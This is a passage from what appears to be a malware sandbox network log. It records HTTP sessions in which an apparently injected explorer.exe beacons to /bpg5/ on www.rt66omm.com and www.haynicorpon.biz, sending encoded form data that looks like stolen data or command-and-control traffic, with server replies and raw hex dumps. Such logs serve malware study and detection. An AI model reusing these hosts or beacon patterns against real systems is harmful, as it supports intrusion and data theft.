d7 d9 e9 04 3c f9 fc 92 bb fc f8 fb 5c 1d e9 89 96 9f c3 2c cc b2 d4 3d 91 b2 a2 c5 e7 17 ba c3 c5 f5 39 0e b3 53 96 a5 9f 95 bf cd 18 f4 b0 c8 ca 32 2b e2 43 9c 6a 07 d3 05 c2 e6 b7 a0 0c 28 22 2f b4 cc 4e 94 53 27 7d 71 f9 00 90 d2 f9 3f 7c fe b2 9c 6d 66 de 27 47 21 b9 8a ab 84 7e 5d 7a 4b e7 5f fe ab 7f eb fc 93 7f f5 ef fe e5 3f 76 fe 93 f3 6f b2 73 45 9d f5 da c9 52 e7 5f bc 39 ff 22 4e a3 9f 3f b3 a6 4c bb 40 3d e2 c7 22 db 65 55 f9 63 ad 45 fc 78 22 af 6c e9 c0 51 0c ba 42 90 90 e2 40 7f fc cc d5 8f bc c8 72 5a 54 6f 5f 3e 65 87 00 66 4a d6 40 e8 ae 8c ab 5a 29 50 9a 46 b4 0c 8b 38 d7 d4 82 7f 12 a7 11 50 58 53 fb ef 8f a4 72 fe 63 76 76 fe cf ac ac fe 46 a8 17 2a 52 18 af 84 55 1d b9 f3 9f 1c db d8 ad 90 ce 45 22 c1 01 f9 2a 35 01
                                        Data Ascii: 19f32H+<huFO0{2J:iWh%HB =" 9$#/*=h^v?`?`O^I2?";72`itMzsNO'!?)|q#)JZ}t9/yVT0K+V_>Qu8.ei\$q$?K=B\=-ZH_#M({Iu'RhXY*hBc/iI~s|4*<~reVp")9bfk$%[p(7!y|0J+ga}B:(-b\%Q9;KhYJah()eE8|*G_)Vr3IWUIsAg<\(XpF&s1\9YY&.9YavZF1qNYyOpFS2{&DH2$#'_>JKXUysQ<\,=9S2+Cj("/NS'}q?|mf'G!~]zK_?vosER_9"N?L@="eUcEx"lQB@rZTo_>efJ@Z)PF8PXSrcvvF*RUE"*5
                                        May 23, 2023 09:40:08.813478947 CEST196INData Raw: 5b 7a cb cf d6 ae b8 bb 68 9d 07 0a 67 19 16 94 a6 e5 31 ab 66 bf e5 07 2b 16 e0 e6 13 4c 94 84 c9 32 b1 d6 be 49 06 3a 9f d4 f1 37 f2 f4 cf ff b5 d9 94 14 55 1c 26 34 c8 cf bb 24 2e 8f 34 7a aa 62 05 e1 27 31 f5 4c f3 ac 5e e2 aa a2 45 10 92 22
                                        Data Ascii: [zhg1f+L2I:7U&4$.4zb'1L^E"oO(-O=7zDpB&N$kiWueGSE^k-lk~qJO$hMyEY|rpz|sO?we}=)>@7h/
                                        May 23, 2023 09:40:08.813508034 CEST197INData Raw: 95 5f 2d 52 3b 4c 79 2d d9 16 d1 2a 14 0a b6 69 bb f0 20 17 3a 7e 07 39 ed f8 99 4d e0 c4 d8 25 15 55 9c db 19 00 2a 20 e7 2a 13 86 07 e2 66 5f ba 54 bf de ca ae b1 dd 96 bd bb f2 53 42 d3 a7 db b5 45 59 2d be 81 f6 29 b3 4b 1a 05 f8 76 d3 88 74
                                        Data Ascii: _-R;Ly-*i :~9M%U* *f_TSBEY-)KvtS:@7jpT/h{[JXFo*dK,IH^R?d#r\/`6FJxwQNP:\%Fj`JhjE:8HQTqIHDS&x-v
                                        May 23, 2023 09:40:08.813533068 CEST199INData Raw: 76 29 8b bc b9 02 93 93 c4 92 29 62 ca 49 d3 30 4b 5a f4 f4 4b f8 99 d1 31 2f 34 03 5d 1d f1 25 3b 4e 1c c9 82 ee eb 2e 39 dc 53 f6 3b 3c cb 13 b7 79 5c 23 97 be 74 70 40 8e 56 b2 1b 8f f8 d8 4f d9 8a 9e 69 c1 82 fd 15 97 19 9b 7f f9 1e 36 cf ca
                                        Data Ascii: v))bI0KZK1/4]%;N.9S;<y\#tp@VOi6CV}vB7J%`MH?*Rh~7OR?}\I(vn@ ;Oiq4UN>A0i`>wtr0N[{K-:vekSs/`$mz'!euM[l
                                        May 23, 2023 09:40:08.813561916 CEST200INData Raw: 31 15 4a cb 3e 74 f4 9e 09 0e f9 f2 64 c8 0d fb 50 30 60 2e 58 6c ff e5 b9 90 da 99 12 41 d3 68 dc aa e0 d0 7b cc 86 d2 b2 1f 25 bd e7 83 c3 be 3c 1f 72 c3 7e 34 5c 98 11 29 dd b2 c8 f6 28 b6 23 bc 06 e1 a9 98 f5 df 86 9f de 1d c0 46 21 e2 cf 6e
                                        Data Ascii: 1J>tdP0`.XlAh{%<r~4\)(#F!n+!9@;8qD3vtkU.!N?c"GOg+1__l+x3Fh~`qyoyA5V$y5IXei^P_"#F@&z@g3~
                                        May 23, 2023 09:40:08.813589096 CEST201INData Raw: 2a 59 81 2b a1 07 41 a5 d7 d9 06 6a c0 ce 36 72 3e c4 da 26 32 14 40 5b 30 cf fc 16 cb ae 99 16 26 f7 a3 04 50 9d 9d b1 0b 49 13 e7 b1 e0 4c e2 b4 94 b5 c3 d8 79 95 3c 4b 95 98 51 67 13 65 5c 06 70 1d ae 2b c2 22 cb 73 1a d9 35 22 70 d8 df 14 de
                                        Data Ascii: *Y+Aj6r>&2@[0&PILy<KQge\p+"s5"pB7S'q(q}2AgI'8gEXpDz{4N!k:a5164x\F{,2wO]U~qKZ]^+kd*H(X@z^5wuH
                                        May 23, 2023 09:40:08.813615084 CEST202INData Raw: 7c ed 1e c5 1e ec 0c 13 8c 81 5b d4 e8 d1 36 8c 7e 97 ce a0 5e 07 be 2d 9f 65 bb ce d5 d3 fb d5 e3 8c 93 12 78 f6 70 43 15 d9 39 6f b1 ac 8e 3e ca 91 54 ad e6 38 37 be 2c 8c 2f 4b e3 cb ca f8 b2 d6 be bc d7 da f9 6c 0e ef 19 e7 b3 05 04 64 48 7c
                                        Data Ascii: |[6~^-expC9o>T87,/KldH|f@]xL*ISI76 ]'+3u?'{/z#|1UqEJ#sX@C>*j5e!3V8f.6R[nG4`(1'oO2Rzo|3
                                        May 23, 2023 09:40:08.813640118 CEST204INData Raw: de 23 46 f2 a3 13 9e c1 12 23 cc f3 22 bd 6c 83 6a 19 fd 15 f3 d7 09 cf a0 57 4d 19 7d 71 02 59 7f 14 5c b6 22 02 9f 2d 85 22 7b 09 fc 3a d6 e6 0a 99 78 57 97 a2 8c 62 2e a3 a8 15 2a 67 fb c3 e3 4b 56 44 ee ae a0 e4 5b 80 7f ba f0 c1 8a bc 65 0d
                                        Data Ascii: #F#"ljWM}qY\"-"{:xWb.*gKVD[eLye[VOOH[nIiIGGQBlHV;Ixi%3efVWL?_CYCRAqyPy<Hk~Z68hY>_OM}&%yIF
                                        May 23, 2023 09:40:08.813666105 CEST205INData Raw: 37 1f aa 4b 9f 21 9c 11 23 05 ad c3 96 c6 98 c3 95 09 78 51 ad 1e 36 a6 37 92 38 55 aa 4b ca 14 35 25 09 dd 30 c9 4a b9 2a 70 5b b3 0c 23 93 7b 41 14 4d 45 65 d9 16 22 25 22 a2 98 24 d9 e1 fd 40 f2 fa 91 b7 51 f7 4b 32 ce d4 5b 7c fb dc 83 8c 38
                                        Data Ascii: 7K!#xQ678UK5%0J*p[#{AMEe"%"$@QK2[|8d:>;P3X7\bmp@;R`PzbJmZ+sw-lY!"Ztb gFmK-e,gHc_
                                        May 23, 2023 09:40:08.813695908 CEST206INData Raw: f0 bc 7f 47 0a 67 20 5b 38 0a e9 b1 d8 72 dd 79 3b 8d 99 55 3e 06 f3 62 9e bf 7e ff 7e ac 4e 2c ed 4c 83 e5 bd 76 25 b3 77 28 d6 05 6e 15 01 6e 55 b2 b3 53 40 61 77 6e 4d fa 0a 39 a9 85 51 a9 ad 99 9a 2e 04 11 2d c3 22 ce f1 49 fc 45 7f 93 04 68
                                        Data Ascii: Gg [8ry;U>b~~N,Lv%w(nnUS@awnM9Q.-"IEh]]Cj8rlszAy"II1!^9!7@EH{!Jb_%Vl2*ZiGc|1AE=O8[7y=HP=1!)]*ap}iLDsi0u
                                        May 23, 2023 09:40:09.093611956 CEST208INData Raw: d7 b1 b9 bd 7b c8 a4 cb 5b 0a 57 ea d1 e2 63 9b a9 a6 e6 af 55 57 42 3d 36 1b 59 12 12 a5 f6 d2 dc f0 18 b7 9b 64 bd 11 80 64 70 5f a4 7c 51 a1 85 6f 68 71 d6 aa 60 b5 0b 33 ee 17 bc f8 83 91 02 b9 c3 3c 84 71 09 a1 46 03 c9 16 3a ca 76 23 0e 5d
                                        Data Ascii: {[WcUWB=6Yddp_|Qohq`3<qF:v#];kRpTT{u`Af;<cmQ+(4pdcGKOSkFcXh.)RZz+BLL77'8ga'`z>hQ^V:5nQWSWJJS6%H


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        13192.168.2.549736118.27.125.17280C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 23, 2023 09:40:11.435422897 CEST289OUTGET /bpg5/?yDcF=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuheTeyylBQBjx3TTw==&jdd=UX4BZm HTTP/1.1
                                        Host: www.rt66omm.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        May 23, 2023 09:40:11.765084028 CEST289INHTTP/1.1 301 Moved Permanently
                                        Date: Tue, 23 May 2023 07:40:11 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Connection: close
                                        Server: LiteSpeed
                                        x-powered-by: PHP/8.1.19
                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        cache-control: no-cache, must-revalidate, max-age=0
                                        x-redirect-by: WordPress
                                        location: http://rt66omm.com/bpg5/?yDcF=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuheTeyylBQBjx3TTw==&jdd=UX4BZm
                                        vary: Accept-Encoding
                                        x-turbo-charged-by: LiteSpeed


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        14192.168.2.549737183.90.228.4680C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 23, 2023 09:40:17.494445086 CEST292OUTPOST /bpg5/ HTTP/1.1
                                        Host: www.haynicorpon.biz
                                        Connection: close
                                        Content-Length: 1482
                                        Cache-Control: no-cache
                                        Origin: http://www.haynicorpon.biz
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.haynicorpon.biz/bpg5/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 79 44 63 46 3d 4a 33 4e 6b 78 76 66 41 6d 32 54 4c 34 33 7e 30 73 38 58 67 52 44 6a 58 54 33 52 75 47 6b 67 66 32 30 49 50 78 77 33 65 7e 68 4e 5f 44 63 4e 4c 65 35 50 4f 36 4e 72 36 43 5a 33 33 71 66 31 38 4c 34 4e 75 49 42 50 43 36 2d 35 34 28 4b 49 6f 65 61 76 49 44 5a 4a 58 47 77 6b 31 39 36 57 43 32 55 58 68 45 41 54 6d 68 75 71 39 6f 4b 4a 74 77 68 5a 2d 59 71 6d 37 6d 58 59 37 71 75 49 54 73 6e 30 47 58 75 34 39 36 4c 45 50 34 59 4a 34 59 79 4c 4d 6f 64 78 36 6f 71 53 6e 38 50 56 36 75 65 71 64 70 68 33 6e 50 63 48 45 41 55 57 37 4a 39 45 6c 63 35 72 4a 70 78 55 52 74 73 52 4c 35 59 67 67 55 73 39 4c 66 33 59 36 45 61 36 77 6e 36 6a 6c 71 30 39 49 58 36 33 34 66 63 48 39 64 43 4f 47 72 34 52 77 6a 45 4d 31 36 58 63 38 53 61 57 43 67 64 53 4a 70 6e 38 37 55 4e 65 72 36 71 51 57 63 4f 53 51 54 67 36 76 6d 57 79 61 39 6c 5a 77 39 55 75 76 78 79 53 4e 52 57 41 78 51 4d 64 5a 50 48 28 78 6b 59 4c 6e 76 62 78 79 57 34 44 6d 70 34 49 31 36 58 46 4d 78 6d 55 63 47 74 50 4a 55 6b 6c 57 43 4f 73 4c 45 4a 28 7a 75 5a 6a 52 6b 49 6c 44 71 36 64 35 32 67 34 65 59 2d 38 71 39 32 5a 72 55 46 46 38 65 6d 62 4d 47 56 52 33 48 41 71 75 52 47 59 43 49 49 37 4f 44 61 44 5f 47 58 56 67 30 4e 6c 53 63 38 50 73 38 2d 65 30 4c 4d 65 56 47 32 46 4c 6e 32 47 55 72 31 56 36 4d 61 28 66 6f 52 6e 79 6d 77 66 43 63 73 4c 2d 39 59 7a 6c 37 76 75 47 6b 61 44 72 4b 73 4d 52 55 42 57 76 30 43 4a 33 38 49 55 77 45 35 66 4d 71 78 78 4a 72 4d 74 39 50 72 43 59 4a 73 64 31 73 75 68 32 4e 78 7e 54 73 6a 4d 58 5a 71 41 4c 32 38 32 76 39 36 56 6f 39 58 66 75 36 79 39 75 39 4c 76 46 37 57 5a 7a 6f 33 55 77 57 78 37 61 7a 34 73 75 6f 4e 52 4e 71 73 72 50 4d 66 7a 31 44 51 6d 31 6b 6f 58 36 78 48 7e 44 53 41 44 48 66 44 32 68 47 33 38 2d 52 4a 4d 41 61 45 6e 2d 7e 54 59 62 46 71 57 56 4b 6c 4f 4d 76 73 62 6e 78 66 76 37 73 69 6f 76 39 68 58 6b 73 6b 58 66 66 44 59 42 6b 5f 44 57 44 33 37 2d 34 54 6f 44 56 77 38 74 70 64 70 32 47 59 4e 79 35 6e 69 4d 49 44 55 58 72 5f 48 49 30 5a 64 6b 55 41 53 56 59 33 32 6d 53 32 46 7a 6d 74 56 54 39 57 61 76 4d 33 65 4d 4b 4f 58 6b 4a 35 6f 4b 54 59 74 52 6c 76 28 62 61 56 4c 4c 62 62 6d 69 63 57 36 6f 31 76 36 4e 62 45 33 38 38 62 34 71 68 6d 4d 39 66 62 6a 70 66 50 28 66 7e 33 6d 6f 61 4a 49 4b 54 66 54 4b 45 45 7e 58 61 2d 59 55 59 70 68 4f 36 47 58 7a 36 5a 48 76 4a 47 4d 73 58 64 56 79 76 5a 67 2d 73 7a 53 42 48 6e 31 6d 45 54 6d 44 6f 33 63 35 79 50 44 64 79 53 57 2d 75 6e 74 43 6e 61 31 77 33 4c 37 33 51 31 28 77 6f 74 4b 6b 65 48 73 2d 65 65 65 56 55 46 36 75 58 5a 4d 46 6a 79 49 4f 34 43 39 6b 38 67 76 6d 77 45 56 43 79 76 4d 74 39 58 4b 61 4a 49 65 46 36 45 70 4f 37 36 37 51 57 66 34 4b 39 33 35 30 6c 6a 55 46 6f 35 36 75 4d 4c 57 4e 71 72 33 2d 73 59 32 63 30 55 39 5a 33 44 56 4f 6b 6f 4e 73 65 38 70 39 70 63 52 4d 6e 5f 66 55 65 70 68 77 75 59 76 38 31 56 6d 38 75 55 55 76 4d 69 6b 70 45 53 7e 58 6d 46 6b 57 61 63 56 31 42 78 4c 4c 41 6d 4e 57 71 75 77 77 4e 75 51 78 67 58 49 79 59 7a 4c 6d 38 75 34 4b 59 44 6d 30 46 37 4b 76 43 72 39 71 49 4e 36 75 75 76 37 5f 6f 46 66 79 7a 7a 78 70 7e 41 4b 4d 68 63 70 33 35 43 28 6e 32 6d 43 68 72 4c 39 68 76 64 51 64 49 55 6a 2d 75 6f 59 35 6e 31 57 75 72 53 34 39 61 76 41 57 54 36 4a 6f 31 70 56 41 73 33 55 59 68 64 5a 5f 62 2d 72 69 49 46 63 70 70 4d 6d 32 63 6a 58 72 54 42 6d 55 52 4b 5a 6d 52 33 66 5f 73 43 68 42 69 33 74 5a 54 67 69 71 34 4b 61 54 79 7a 76 50 7e 76 48 33 5a 57 6b 52 38 6a 32 42 6f 5a 30 6d 6a 33 39 64 4b 33 68 5f 77 65 66 41 7e 4e 56 56 70 32 32 35 50 31 41 7a 69 55 39 67 53 31 35 63 77 4a 45 5a 67 63 63 4f 45 58 50 65 67 4a 38 38 56 65 6b 6f 49 79 52 68 69 50 49 74 77 4e 6b 52 76 47 48 5f 51 4a 48 64 35 7a 46 6c 45 58 6c 45 41 56 4e 59 49 52 4c 4b 78 32 47 7a 62 38 6f 6b 45 48 57 65 56 76 41 57 71 37 51 38 50 62 61 2d 5a 6f 46 66 49 50 58 62 74 4b 6c 67 35 34 72 56 42 48 4c 6f 35 33 4f 6a 57 61 56 50 66 52 77 57 55 6d 30 33 6f 32 71 61 50 6f 57 5a 75 34 32 48 56 62 52 56 56 4c 50 2d 33 31 68 43 4e 71 61 75 6a 31 55 56 53 4d 77 4e 73 42 51 35 35 68 47 62 30 5f 47 5a 67 39 4a 42 77 42 74 47 56 6d 47 75 30 58 67 36 63 5f 42 63 63 78 5a 75 64 49
                                        Data Ascii: yDcF=J3NkxvfAm2TL43~0s8XgRDjXT3RuGkgf20IPxw3e~hN_DcNLe5PO6Nr6CZ33qf18L4NuIBPC6-54(KIoeavIDZJXGwk196WC2UXhEATmhuq9oKJtwhZ-Yqm7mXY7quITsn0GXu496LEP4YJ4YyLModx6oqSn8PV6ueqdph3nPcHEAUW7J9Elc5rJpxURtsRL5YggUs9Lf3Y6Ea6wn6jlq09IX634fcH9dCOGr4RwjEM16Xc8SaWCgdSJpn87UNer6qQWcOSQTg6vmWya9lZw9UuvxySNRWAxQMdZPH(xkYLnvbxyW4Dmp4I16XFMxmUcGtPJUklWCOsLEJ(zuZjRkIlDq6d52g4eY-8q92ZrUFF8embMGVR3HAquRGYCII7ODaD_GXVg0NlSc8Ps8-e0LMeVG2FLn2GUr1V6Ma(foRnymwfCcsL-9Yzl7vuGkaDrKsMRUBWv0CJ38IUwE5fMqxxJrMt9PrCYJsd1suh2Nx~TsjMXZqAL282v96Vo9Xfu6y9u9LvF7WZzo3UwWx7az4suoNRNqsrPMfz1DQm1koX6xH~DSADHfD2hG38-RJMAaEn-~TYbFqWVKlOMvsbnxfv7siov9hXkskXffDYBk_DWD37-4ToDVw8tpdp2GYNy5niMIDUXr_HI0ZdkUASVY32mS2FzmtVT9WavM3eMKOXkJ5oKTYtRlv(baVLLbbmicW6o1v6NbE388b4qhmM9fbjpfP(f~3moaJIKTfTKEE~Xa-YUYphO6GXz6ZHvJGMsXdVyvZg-szSBHn1mETmDo3c5yPDdySW-untCna1w3L73Q1(wotKkeHs-eeeVUF6uXZMFjyIO4C9k8gvmwEVCyvMt9XKaJIeF6EpO767QWf4K9350ljUFo56uMLWNqr3-sY2c0U9Z3DVOkoNse8p9pcRMn_fUephwuYv81Vm8uUUvMikpES~XmFkWacV1BxLLAmNWquwwNuQxgXIyYzLm8u4KYDm0F7KvCr9qIN6uuv7_oFfyzzxp~AKMhcp35C(n2mChrL9hvdQdIUj-uoY5n1WurS49avAWT6Jo1pVAs3UYhdZ_b-riIFcppMm2cjXrTBmURKZmR3f_sChBi3tZTgiq4KaTyzvP~vH3ZWkR8j2BoZ0mj39dK3h_wefA~NVVp225P1AziU9gS15cwJEZgccOEXPegJ88VekoIyRhiPItwNkRvGH_QJHd5zFlEXlEAVNYIRLKx2Gzb8okEHWeVvAWq7Q8Pba-ZoFfIPXbtKlg54rVBHLo53OjWaVPfRwWUm03o2qaPoWZu42HVbRVVLP-31hCNqauj1UVSMwNsBQ55hGb0_GZg9JBwBtGVmGu0Xg6c_BccxZudIkVvbFx13qi~NParkQaROKYKhG70PkggZxwKrBKa0Gz~WrCG8lhTLVZdN9IIcSMoBFoZhZD4JKepHY8c4mMPVp12TAvsfhONoY4DAh_41SVUXFj6q6Psw).
                                        May 23, 2023 09:40:17.776258945 CEST294INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 23 May 2023 07:40:17 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Last-Modified: Fri, 05 Oct 2018 09:13:39 GMT
                                        ETag: W/"afe-57777afe91410"
                                        Content-Encoding: gzip
                                        Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7 e2 05 6c c7 f5 d7 36 e3 4d ba 31 95 3f b4 8f fa 74 81 87 7a dc ed 23 7e 32 ad 1b 44 7c b6 d7 b6 57 b2 ab f8 cf c4 9f be 02 ca f7 7a d5 37 d6 99 ae 81 06 94 74 21 39 dd 29 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b
                                        Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9),KQ8xa%9s{Qo/|mu1.C-r[
                                        May 23, 2023 09:40:17.776329994 CEST294INData Raw: 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64
                                        Data Ascii: ,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        15192.168.2.549738183.90.228.4680C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 23, 2023 09:40:23.319513083 CEST295OUTPOST /bpg5/ HTTP/1.1
                                        Host: www.haynicorpon.biz
                                        Connection: close
                                        Content-Length: 186
                                        Cache-Control: no-cache
                                        Origin: http://www.haynicorpon.biz
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.haynicorpon.biz/bpg5/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 79 44 63 46 3d 4a 33 4e 6b 78 76 66 41 6d 32 54 4c 34 30 57 30 74 74 58 67 54 6a 6a 58 55 33 52 75 4a 45 67 56 32 30 45 48 78 78 44 4f 7e 57 52 5f 44 4e 39 4c 4c 62 6e 4f 35 4e 72 39 4e 35 32 2d 6b 5f 31 54 4c 34 4e 36 49 44 62 43 36 36 70 34 35 6f 77 6f 59 65 62 50 63 35 4a 43 4e 51 6b 34 39 36 61 68 32 55 4c 71 45 41 37 6d 68 73 7e 39 72 4b 5a 74 32 45 74 2d 4a 4b 6d 48 78 48 59 67 71 75 30 43 73 6e 45 34 58 71 41 39 36 36 49 50 34 6f 70 34 66 6a 4c 4d 39 4e 78 37 77 36 54 79 33 64 45 43 74 6f 53 39 6f 68 69 41 53 74 6e 4b 42 31 76 52 4b 77 29 2e 00 00 00 00 00 00 00 00
                                        Data Ascii: yDcF=J3NkxvfAm2TL40W0ttXgTjjXU3RuJEgV20EHxxDO~WR_DN9LLbnO5Nr9N52-k_1TL4N6IDbC66p45owoYebPc5JCNQk496ah2ULqEA7mhs~9rKZt2Et-JKmHxHYgqu0CsnE4XqA966IP4op4fjLM9Nx7w6Ty3dECtoS9ohiAStnKB1vRKw).
                                        May 23, 2023 09:40:23.604749918 CEST297INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 23 May 2023 07:40:23 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Last-Modified: Fri, 05 Oct 2018 09:13:39 GMT
                                        ETag: W/"afe-57777afe91410"
                                        Content-Encoding: gzip
                                        Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 